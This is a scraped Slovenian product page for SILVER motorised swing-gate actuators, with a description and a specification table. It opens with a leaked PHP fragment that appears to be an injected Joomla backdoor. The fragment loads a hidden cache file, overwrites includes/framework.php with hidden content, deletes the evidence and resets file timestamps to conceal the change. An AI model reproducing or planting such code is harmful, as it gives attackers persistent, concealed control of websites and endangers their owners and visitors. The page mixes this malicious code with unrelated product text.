$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Motorizirani pogoni za krilna vrata SILVER

Motorizirani pogoni za krilna vrata SILVER

SILVER motoriziran pogon je idealna rešitev za avtomatsko odpiranje vratnih kril, ki so široka od 3,5 do 5 metrov.

Aluminijski sistem je prevlečes s plastjo epoksija in tako zagotavlja varnost in obstojnost v kakršnih koli klimatskih razmerah. Ob prekinitvi električnega toka je vrata mogoče upravljati manualno in sicer s ključem, saj ima pogon ključavnico, ki je elegantno skrita.

TEHNIČNE SPECIFIKACIJE:

SILVER 1B SILVER 40 B
Description: Electromechanical Actuator non reversible suitable for wing up to 3,5 m non reversible suitable for wing up to 5 m
Maximum capacity 300 kg × 2,5 m 200 kg ×3,5 m 400kg × 2,5 m 150 kg ×3,5 m
Type of use frequent frequent
Intermittency S2 = 15 min S1 = 25% S2 = 15 min S1 = 25%
Motor power supply 230 V~ / 50 Hz 230 V~ / 50 Hz
Input 1.1 A 1.1 A
Thrust 3000 N 3000 N
Opening time 22 s/90° 38 s/90°
Max stroke 280 mm 480 mm
Maximum opening 100° 120°
Release for manual opening by key by key
Operating temperature -20°C / +55°C -20°C / +55°C
Protection degree IP 45 IP 45
Product dimensions 90x120x1096 90x120x1506